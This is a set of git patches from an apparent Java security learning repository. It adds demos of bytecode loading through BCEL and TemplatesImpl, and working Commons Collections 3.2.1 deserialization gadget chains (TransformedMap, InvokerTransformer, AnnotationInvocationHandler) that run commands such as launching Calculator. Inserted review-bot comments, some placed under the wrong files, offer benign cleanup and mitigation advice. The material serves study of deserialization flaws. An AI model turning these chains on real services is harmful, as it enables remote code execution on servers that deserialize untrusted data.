From 158019f15e03043b4c0e79b5c76e8f5ead87a557 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 27 Oct 2020 23:33:16 +0800 Subject: [PATCH 01/35] =?UTF-8?q?=E7=95=AA=E5=A4=96=E7=AF=871?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 1 + general/src/main/java/com/govuln/HelloTemplatesImpl.java | 6 +----- 2 files changed, 2 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index c7ded84..0af1ec0 100644 --- a/README.md +++ b/README.md @@ -16,6 +16,7 @@ - [Java安全漫谈 - 10.用TransformedMap编写真正的POC](https://t.zsxq.com/ZNZrJMZ) - [Java安全漫谈 - 11.LazyMap详解](https://t.zsxq.com/FufUf2B) - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) +- [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://mp.weixin.qq.com/s/TBSlxuxhdvHZrJVPObiRYQ) ## Demo代码 diff --git a/general/src/main/java/com/govuln/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/HelloTemplatesImpl.java index a104309..3176cbe 100644 --- a/general/src/main/java/com/govuln/HelloTemplatesImpl.java +++ b/general/src/main/java/com/govuln/HelloTemplatesImpl.java 
@@ -16,12 +16,8 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java byte[] code = Base64.getDecoder().decode("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"); - - // source: bytecodes/Foo.java - byte[] foo = Base64.getDecoder().decode("yv66vgAAADQADQoAAwAKBwALBwAMAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAClNvdXJjZUZpbGUBAAhGb28uamF2YQwABAAFAQADRm9vAQAQamF2YS9sYW5nL09iamVjdAAhAAIAAwAAAAAAAQABAAQABQABAAYAAAAdAAEAAQAAAAUqtwABsQAAAAEABwAAAAYAAQAAAAEAAQAIAAAAAgAJ"); - TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][] {code, foo}); + setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); From 4d77687b78233f0c729b5e831db85ea56aa6c869 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 27 Oct 2020 23:38:33 +0800 Subject: [PATCH 02/35] replace url --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0af1ec0..360ecc2 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ - [Java安全漫谈 - 10.用TransformedMap编写真正的POC](https://t.zsxq.com/ZNZrJMZ) - [Java安全漫谈 - 11.LazyMap详解](https://t.zsxq.com/FufUf2B) - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) -- [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://mp.weixin.qq.com/s/TBSlxuxhdvHZrJVPObiRYQ) +- [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) ## Demo代码 From a22aa8bd9772a945ef65142d2724b9e95a1b5356 Mon Sep 17 00:00:00 2001 
From: phith0n Date: Mon, 2 Nov 2020 04:24:46 +0800 Subject: [PATCH 03/35] bcel --- .../src/main/java/com/govuln/HelloBCEL.java | 23 +++++++++++++++++++ general/src/main/java/evil/Hello.java | 7 ++++++ 2 files changed, 30 insertions(+) create mode 100644 general/src/main/java/com/govuln/HelloBCEL.java create mode 100644 general/src/main/java/evil/Hello.java diff --git a/general/src/main/java/com/govuln/HelloBCEL.java b/general/src/main/java/com/govuln/HelloBCEL.java new file mode 100644 index 0000000..7332376 --- /dev/null +++ b/general/src/main/java/com/govuln/HelloBCEL.java 
@@ -0,0 +1,23 @@ +package com.govuln; + +import com.sun.org.apache.bcel.internal.classfile.JavaClass; +import com.sun.org.apache.bcel.internal.classfile.Utility; +import com.sun.org.apache.bcel.internal.Repository; +import com.sun.org.apache.bcel.internal.util.ClassLoader; + +public class HelloBCEL { + public static void main(String []args) throws Exception { + // encode(); + decode(); + } + + protected static void encode() throws Exception { + JavaClass cls = Repository.lookupClass(evil.Hello.class); + String code = Utility.encode(cls.getBytes(), true); + System.out.println(code); + } + + protected static void decode() throws Exception { + new ClassLoader().loadClass("$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmP$cbN$CA$Q$ac$91$c7$$$cb$w$I$e2$fby0$B$P$ee$c5$h$c4$8b$89$f1$b0Q$T$M$9e$87e$82C$86$j$b3$M$q$7e$96$k4$f1$e0$H$f8Q$c6$9e$91$f8H$ecCW$ba$aa$ba$d23$ef$l$afo$AN$b0$X$a0$88$e5$Sj$a8$fbX$J$d0$c0$aa$875$P$eb$M$c5$8eL$a59e$c85$5b$3d$86$fc$99$k$I$86J$ySq9$j$f7Ev$c3$fb$8a$98Z$ac$T$aez$3c$93v$9e$93ys$t$t$Ma$yfRE$XB$v$ddf$f0$3b$89$9a$87$G$5d$3d$cd$Sq$$$ad$3bp$86$e3$R$9f$f1$Q$k$7c$P$h$n6$b1$c5Pv$ca$fe$ad$ce$d4$c0$c3v$88$j$ec$92$ff$t$95$a1j$d7$o$c5$d3at$d5$l$89$c4$fc$a1$ba$P$T$p$c6$f4$I$3d$r$a1$R$3bE$ea$e8$3a$93$a9$e9$9aL$f01$jV$ff$87f$f0$ee$ed$a4R$dak$c6$bf$o$N$d1$c3v$ab$87$D$U$e8$fbl$z$80$d9$c3$a9$97h$8a$I$Za$e1$e8$F$ec$d1$c9$B$f5$a2$ps$uS$P$bf$M$84$8b$84$3e$96$be$97$P$c9m$ab$f4$84$85Z$ee$Zy$h$c0$5c$40$e0$a4$CYmT$c5$FW$3f$B$dc$ab$c0$7f$cc$B$A$A").newInstance(); + } +} diff --git a/general/src/main/java/evil/Hello.java b/general/src/main/java/evil/Hello.java new file mode 100644 index 0000000..ad3f297 --- /dev/null +++ b/general/src/main/java/evil/Hello.java @@ -0,0 +1,7 @@ +package evil; + +public class Hello { + static { + System.out.println("Hello World"); + } +} From 992249b6de2e772b144f468fd9f7fc05536a8b7e Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 3 Nov 2020 00:06:48 +0800 Subject: [PATCH 04/35] add a new section --- README.md | 2 ++ 1 file changed, 2 insertions(+) 
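Review bot: `decode()` instantiates the loaded class with `Class.newInstance()`, which is deprecated since Java 9 because it lets checked exceptions thrown by the constructor escape undeclared; the drop-in replacement is `new ClassLoader().loadClass("$$BCEL$$...").getDeclaredConstructor().newInstance();`. Neither method is documented and `encode()` is commented out in `main`, so a reader cannot tell that the long `$$BCEL$$` literal in `decode()` is apparently the string `encode()` prints for `evil.Hello` (added in the same commit, whose static initialiser prints "Hello World"); a class comment along the lines of `// encode(): print evil.Hello as a $$BCEL$$-encoded string; decode(): hand that string to the JDK-internal BCEL ClassLoader, which materialises and initialises the class` would make the demo self-explanatory. Everything here depends on the JDK-internal `com.sun.org.apache.bcel.internal` package, which the '番外篇1' article linked from the README suggests is no longer present in current JDKs, so the comment should also record the JDK version the demo was verified on.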
diff --git a/README.md b/README.md index 360ecc2..9b3d0b3 100644 --- a/README.md +++ b/README.md @@ -17,6 +17,7 @@ - [Java安全漫谈 - 11.LazyMap详解](https://t.zsxq.com/FufUf2B) - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) +- [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) ## Demo代码 @@ -24,3 +25,4 @@ - 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/HelloClassLoader.java) - 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/HelloDefineClass.java) - 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/HelloBCEL.java) From e8ce81e636af29ce849f1bdc6c175eb30731acd6 Mon Sep 17 00:00:00 2001 
From: phith0n Date: Tue, 22 Dec 2020 04:40:20 +0800 Subject: [PATCH 05/35] update --- deserialization/.gitignore | 3 - deserialization/deserialization.iml | 2 - deserialization/pom.xml | 75 ------------------- general/general.iml | 2 - general/pom.xml | 7 +- .../com/govuln/{ => bytes}/HelloBCEL.java | 2 +- .../govuln/{ => bytes}/HelloClassLoader.java | 2 +- .../govuln/{ => bytes}/HelloDefineClass.java | 2 +- .../{ => bytes}/HelloTemplatesImpl.java | 2 +- .../CommonCollectionsIntro.java | 25 +++++++ .../deserialization/CommonsCollections3.java | 72 ++++++++++++++++++ .../deserialization}/CommonsCollections6.java | 2 +- .../CommonsCollectionsIntro2.java | 42 +++++++++++ .../CommonsCollectionsIntro3.java | 46 ++++++++++++ .../TemplatesImplDeserialization.java | 71 ++++++++++++++++++ 15 files changed, 267 insertions(+), 88 deletions(-) delete mode 100644 deserialization/.gitignore delete mode 100644 deserialization/deserialization.iml delete mode 100644 deserialization/pom.xml delete mode 100644 general/general.iml rename general/src/main/java/com/govuln/{ => bytes}/HelloBCEL.java (98%) rename general/src/main/java/com/govuln/{ => bytes}/HelloClassLoader.java (93%) rename general/src/main/java/com/govuln/{ => bytes}/HelloDefineClass.java (97%) rename general/src/main/java/com/govuln/{ => bytes}/HelloTemplatesImpl.java (98%) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections3.java rename {deserialization/src/main/java/com/govuln => general/src/main/java/com/govuln/deserialization}/CommonsCollections6.java (98%) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java create mode 100644 general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java 
diff --git a/deserialization/.gitignore b/deserialization/.gitignore deleted file mode 100644 index 406ec20..0000000 --- a/deserialization/.gitignore +++ /dev/null @@ -1,3 +0,0 @@ -*.class -target/ -.idea/ \ No newline at end of file diff --git a/deserialization/deserialization.iml b/deserialization/deserialization.iml deleted file mode 100644 index 78b2cc5..0000000 --- a/deserialization/deserialization.iml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/deserialization/pom.xml b/deserialization/pom.xml deleted file mode 100644 index 4fb8ed9..0000000 --- a/deserialization/pom.xml +++ /dev/null @@ -1,75 +0,0 @@ - - - - 4.0.0 - - com.govuln - deserialization - 1.0-SNAPSHOT - - deserialization - - http://www.example.com - - - UTF-8 - 1.7 - 1.7 - - - - - - commons-collections - commons-collections - 3.2.1 - - - - - - - - - maven-clean-plugin - 3.1.0 - - - - maven-resources-plugin - 3.0.2 - - - maven-compiler-plugin - 3.8.0 - - - maven-surefire-plugin - 2.22.1 - - - maven-jar-plugin - 3.0.2 - - - maven-install-plugin - 2.5.2 - - - maven-deploy-plugin - 2.8.2 - - - - maven-site-plugin - 3.7.1 - - - maven-project-info-reports-plugin - 3.0.0 - - - - - diff --git a/general/general.iml b/general/general.iml deleted file mode 100644 index 78b2cc5..0000000 --- a/general/general.iml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/general/pom.xml b/general/pom.xml index f99f4ec..8c46c88 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -19,7 +19,12 @@ - + + + commons-collections + commons-collections + 3.2.1 + diff --git a/general/src/main/java/com/govuln/HelloBCEL.java b/general/src/main/java/com/govuln/bytes/HelloBCEL.java similarity index 98% rename from general/src/main/java/com/govuln/HelloBCEL.java rename to general/src/main/java/com/govuln/bytes/HelloBCEL.java index 7332376..f0e92af 100644 --- a/general/src/main/java/com/govuln/HelloBCEL.java +++ b/general/src/main/java/com/govuln/bytes/HelloBCEL.java 
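Review bot: The new `commons-collections` dependency is pinned to `3.2.1` without a comment, even though the version is the whole point of the demos that follow: 3.2.2 and later refuse to deserialize `InvokerTransformer` and the other functor classes by default, so the `com.govuln.deserialization` classes only behave as described against this older release. Add an XML comment next to the version element, e.g. `<!-- 3.2.1 on purpose: 3.2.2+ rejects deserialization of InvokerTransformer & co. by default; upgrading is the fix in real projects -->`, so a routine dependency bump does not silently break the demos and readers see the actual mitigation. The XML element names have been stripped in this rendering of the hunk, so the exact placement is inferred.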
@@ -1,4 +1,4 @@ -package com.govuln; +package com.govuln.bytes; import com.sun.org.apache.bcel.internal.classfile.JavaClass; import com.sun.org.apache.bcel.internal.classfile.Utility; diff --git a/general/src/main/java/com/govuln/HelloClassLoader.java b/general/src/main/java/com/govuln/bytes/HelloClassLoader.java similarity index 93% rename from general/src/main/java/com/govuln/HelloClassLoader.java rename to general/src/main/java/com/govuln/bytes/HelloClassLoader.java index 72c4b41..60020e6 100644 --- a/general/src/main/java/com/govuln/HelloClassLoader.java +++ b/general/src/main/java/com/govuln/bytes/HelloClassLoader.java @@ -1,4 +1,4 @@ -package com.govuln; +package com.govuln.bytes; import java.net.URL; import java.net.URLClassLoader; diff --git a/general/src/main/java/com/govuln/HelloDefineClass.java b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java similarity index 97% rename from general/src/main/java/com/govuln/HelloDefineClass.java rename to general/src/main/java/com/govuln/bytes/HelloDefineClass.java index 7caf606..9ae4bb9 100644 --- a/general/src/main/java/com/govuln/HelloDefineClass.java +++ b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java @@ -1,4 +1,4 @@ -package com.govuln; +package com.govuln.bytes; import java.lang.reflect.Method; import java.util.Base64; diff --git a/general/src/main/java/com/govuln/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java similarity index 98% rename from general/src/main/java/com/govuln/HelloTemplatesImpl.java rename to general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java index 3176cbe..598788e 100644 --- a/general/src/main/java/com/govuln/HelloTemplatesImpl.java +++ b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java @@ -1,4 +1,4 @@ -package com.govuln; +package com.govuln.bytes; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 
diff --git a/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java b/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java
new file mode 100644
index 0000000..51a0db5
--- /dev/null
+++ b/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java
@@ -0,0 +1,25 @@
+package com.govuln.deserialization;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.TransformedMap;
+
+import java.util.HashMap;
+import java.util.Map;
+
+public class CommonCollectionsIntro {
+ public static void main(String[] args) throws Exception {
+ Transformer[] transformers = new Transformer[]{
+ new ConstantTransformer(Runtime.getRuntime()),
+ new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"}),
+ };
+
+ Transformer transformerChain = new ChainedTransformer(transformers);
+
+ Map innerMap = new HashMap();
+ Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
+ outerMap.put("test", "xxxx");
+ }
+}
\ No newline at end of file
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java
new file mode 100644
index 0000000..b3f1918
--- /dev/null
+++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java
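Review bot: The class carries no comment saying what it demonstrates, and nothing marks `outerMap.put("test", "xxxx")` on the last line of `main` as the call that runs the chain — the decorated map transforms values on insertion — so the demo executes its command the moment it is run, with no serialization involved yet. A one-line class comment such as `// Intro: ChainedTransformer wired into TransformedMap; the put() at the end of main runs the chain` would orient readers, and the same documentation gap exists in CommonsCollectionsIntro2.java and CommonsCollectionsIntro3.java from this commit. The `exec` argument is a hard-coded macOS Calculator path, which makes the demo platform-specific and is worth stating in that comment. The file also lacks a trailing newline (`\ No newline at end of file`).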
@@ -0,0 +1,72 @@
+package com.govuln.deserialization;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InstantiateTransformer;
+import org.apache.commons.collections.map.TransformedMap;
+
+import javax.xml.transform.Templates;
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.annotation.Retention;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.util.Base64;
+import java.util.HashMap;
+import java.util.Map;
+
+public class CommonsCollections3 {
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static void main(String[] args) throws Exception {
+ // source: bytecodes/HelloTemplateImpl.java
+ byte[] code = 
Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{code}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(TrAXFilter.class), + new InstantiateTransformer( + new Class[] { Templates.class }, + new Object[] { obj }) + }; + + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + Map innerMap = new HashMap(); + innerMap.put("value", "xxxx"); + Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); + + Class clazz = 
Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
+ Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
+ construct.setAccessible(true);
+ InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);
+
+ setFieldValue(transformerChain, "iTransformers", transformers);
+ // ==================
+ // 生成序列化字符串
+ ByteArrayOutputStream barr = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(barr);
+ oos.writeObject(handler);
+ oos.close();
+
+ // 本地测试触发
+ // System.out.println(barr);
+ ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+ Object o = (Object) ois.readObject();
+ }
+}
diff --git a/deserialization/src/main/java/com/govuln/CommonsCollections6.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java
similarity index 98%
rename from deserialization/src/main/java/com/govuln/CommonsCollections6.java
rename to general/src/main/java/com/govuln/deserialization/CommonsCollections6.java
index bdd3d7f..c0e2a1f 100644
--- a/deserialization/src/main/java/com/govuln/CommonsCollections6.java
+++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java
@@ -1,4 +1,4 @@
-package com.govuln;
+package com.govuln.deserialization; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer;
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java
new file mode 100644
index 0000000..d50a6ed
--- /dev/null
+++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java
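Review bot: The `ObjectInputStream` opened for the local trigger (`ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));`) is never closed, `oos.close()` is not protected by a `finally`, and `Object o = (Object) ois.readObject();` keeps an unused local behind a redundant cast; the file already uses Java 8 APIs (`Base64`), so try-with-resources is available: `try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()))) { ois.readObject(); }`. The identical tail appears in TemplatesImplDeserialization.java in this commit and in CommonsCollections6Multiple.java in the PATCH 08/35 commit, so the same fix applies there. Since this `readObject()` stands in for the vulnerable sink, the `// 本地测试触发` comment should state that the stream is deliberately unfiltered and that real code is expected to install a deserialization filter (JEP 290, `ObjectInputStream.setObjectInputFilter` on JDK 9+) or not deserialize untrusted bytes at all — otherwise the demo reads as if a bare `readObject()` were normal.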
@@ -0,0 +1,42 @@
+package com.govuln.deserialization;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.TransformedMap;
+import org.apache.commons.collections.Transformer;
+
+import java.lang.reflect.Field;
+import java.util.Base64;
+import java.util.HashMap;
+import java.util.Map;
+
+public class CommonsCollectionsIntro2 {
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static void main(String[] args) throws Exception {
+ // source: bytecodes/HelloTemplateImpl.java
+ byte[] code = Base64.getDecoder().decode("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");
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][] {code});
+ setFieldValue(obj, "_name", "HelloTemplatesImpl");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ Transformer[] transformers = new Transformer[]{
+ new ConstantTransformer(obj),
+ new InvokerTransformer("newTransformer", null, null)
+ };
+
+ Transformer transformerChain = new ChainedTransformer(transformers);
+
+ Map innerMap = new HashMap();
+ Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
+ outerMap.put("test", "xxxx");
+ }
+}
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java
new file mode 100644
index 0000000..0694a86
--- /dev/null
+++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java
@@ -0,0 +1,46 @@
+package com.govuln.deserialization;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InstantiateTransformer;
+import org.apache.commons.collections.map.TransformedMap;
+import org.apache.commons.collections.Transformer;
+
+import javax.xml.transform.Templates;
+import java.lang.reflect.Field;
+import java.util.Base64;
+import java.util.HashMap;
+import java.util.Map;
+
+public class CommonsCollectionsIntro3 {
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static void main(String[] args) throws Exception {
+ // source: bytecodes/HelloTemplateImpl.java
+ byte[] code = Base64.getDecoder().decode("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");
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][] {code});
+ setFieldValue(obj, "_name", "HelloTemplatesImpl");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ Transformer[] transformers = new Transformer[]{
+ new ConstantTransformer(TrAXFilter.class),
+ new InstantiateTransformer(
+ new Class[] { Templates.class },
+ new Object[] { obj })
+ };
+
+ Transformer transformerChain = new ChainedTransformer(transformers);
+
+ Map innerMap = new HashMap();
+ Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
+ outerMap.put("test", "xxxx");
+ }
+}
diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java
new file mode 100644
index 0000000..ec9aa5e
--- /dev/null
+++ b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java
@@ -0,0 +1,71 @@
+package com.govuln.deserialization;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InstantiateTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.LazyMap;
+import org.apache.commons.collections.map.TransformedMap;
+
+import javax.xml.transform.Templates;
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.annotation.Retention;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Proxy;
+import java.util.Base64;
+import java.util.HashMap;
+import java.util.Map;
+
+public class TemplatesImplDeserialization {
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static void main(String[] args) throws Exception {
+ // source: bytecodes/HelloTemplateImpl.java
+ byte[] code = Base64.getDecoder().decode("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");
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][]{code});
+ setFieldValue(obj, "_name", "HelloTemplatesImpl");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
+ Transformer[] transformers = new Transformer[]{
+ new ConstantTransformer(obj),
+ new InvokerTransformer("newTransformer", 
null, null)
+ };
+
+ Transformer transformerChain = new ChainedTransformer(transformers);
+
+ Map innerMap = new HashMap();
+ innerMap.put("value", "xxxx");
+ Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
+
+ Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
+ Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
+ construct.setAccessible(true);
+ InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);
+
+ // ==================
+ // 生成序列化字符串
+ ByteArrayOutputStream barr = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(barr);
+ oos.writeObject(handler);
+ oos.close();
+
+ // 本地测试触发
+ // System.out.println(barr);
+ ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+ Object o = (Object) ois.readObject();
+ }
+}
